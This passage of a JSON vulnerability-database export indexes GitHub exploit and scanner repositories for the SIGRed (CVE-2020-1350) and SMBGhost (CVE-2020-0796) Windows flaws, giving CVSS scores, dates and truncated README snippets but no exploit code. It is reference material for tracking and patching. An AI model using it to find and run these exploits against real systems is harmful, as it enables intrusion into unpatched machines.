"LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T22:45:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-08-18T07:04:55", "id": "2A7F5F31-A737-556D-A869-05B87FD1F625", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:09", "description": "# CVE-2020-1350\nScanner and Mitigat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-18T13:49:54", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2021-01-27T17:38:05", "id": "0AF42B8A-DF0D-58F8-AB60-9E7C63ED9EEB", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:57:25", "description": "# CVE-2020-1350 (SigRED)\n\nWorkarou...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-14T19:28:46", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2021-05-06T11:57:25", "id": "5F6BE6F7-C220-5BDD-BE92-A5156F21A1B2", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-13T17:58:14", "description": "# CVE-2020-1350 SIGRed Denial of Service PoC Exploit\n\nThis repo ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-16T16:46:48", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2022-01-09T21:16:20", "id": "479FD3C0-1269-5BC3-BD67-CDEE0485485A", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-01T05:55:15", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-22T09:10:15", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-05-31T15:25:40", "id": "23687103-A800-5907-929B-B3A41D121F1B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-09T00:15:09", "description": "Usage:\n\nMake sure Python is installed, then run poc.py.\n\n\nWindow...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-20T09:00:08", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-02-08T17:19:05", "id": "D4A83665-CEF3-5877-9DA4-B03A23BF7461", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-16T15:24:31", "description": "# CVE-2020-0796\r\n\r\nWindows SMBv3 LPE Exploit\r\n\r\n![exploit](https...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-30T11:42:56", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-16T13:42:23", "id": "2F2D8C81-E148-5A14-8750-9403AFEB21A8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T05:55:02", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-05-12T14:41:27", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-04-20T10:00:40", "id": "9A4DB349-101D-5E66-BEB7-19D62F777B8A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:16:33", "description": "# SMBGhost\nSimple scanner for CVE-2020-0796 - SMBv3 RCE.\n\nThe sc...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T15:07:15", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-09-12T02:41:33", "id": "4A6EBCA8-D007-5E59-94B8-7BDA780D94B5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T01:20:01", "description": "# SMBScanner\n Multithread SMB scanner to check CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T20:07:44", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-12-20T23:48:47", "id": "52AA3134-2731-589A-BE46-26ABB8039FE2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-03T05:33:54", "description": "This is Raphael's tinkering around with the SMBGhost LPE.\n\nI sta...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-17T01:48:37", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-02T23:44:07", "id": "2C47C88A-DA77-535C-9BCD-4A89D8B02384", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T08:26:25", "description": "# SMBGhost (CVE-2020-0796) Automate Exploitation and Detection\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-10T16:44:39", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-08-13T03:25:18", "id": "22C095F3-54B6-532B-AE10-73BEE3624D57", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:04:00", "description": "# CVE-2020-0796\nlocal exploit\n\n\ni also got this from the interne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-01-11T04:48:26", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-06-10T10:41:17", "id": "1B787DF3-D66A-5A51-AB8B-DA600B216482", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T14:45:35", "description": "# SMBv3 Ghost...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-06-09T06:18:54", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-06-10T12:36:18", "id": "0522E1EF-0AC6-5DD5-A6DA-6BF91F5A89C4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T13:39:58", "description": "# SMBGhost-LPE-Metasploit-Module\nThis is an implementation of th...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-19T20:38:11", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-25T13:36:10", "id": "FA0B4B9E-5D12-55F9-9E66-FA9CF9AF1B72", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:15:09", "description": "# CVE-2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-09T08:19:55", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2021-10-09T08:24:27", "id": "DE92AD9C-F346-5416-A5F0-5AEC963C9F3B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-11T13:52:54", "description": "# CVE-2020-0796\nWorking Exploit PoC (CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-04-22T09:09:02", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-03-11T09:59:14", "id": "7B8853FF-7CB4-5F4D-B185-FE434458F43D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-18T04:22:57", "description": "# CVE-2020-0796 Remote overflow PO...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-28T05:23:20", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-28T05:37:37", "id": "243C313B-7F90-56EA-BE8E-35A8DFFAEDB2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-20T15:44:33", "description": "# CVE-2020-0796-CNA\n\n\u6839\u636e[danigargu](https://github.com/danigargu/...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-06T15:16:10", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2022-07-20T07:40:59", "id": "709F50E2-7719-5BDB-ABBF-7CF8A820C46F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:04:43", "description": "# CVE-2020-0796\n-----------\n\n# T\u1ed5ng quan:\nT\u00ednh n\u0103ng compression ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-11-10T02:35:34", "type": "githubexploit", "title": "Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 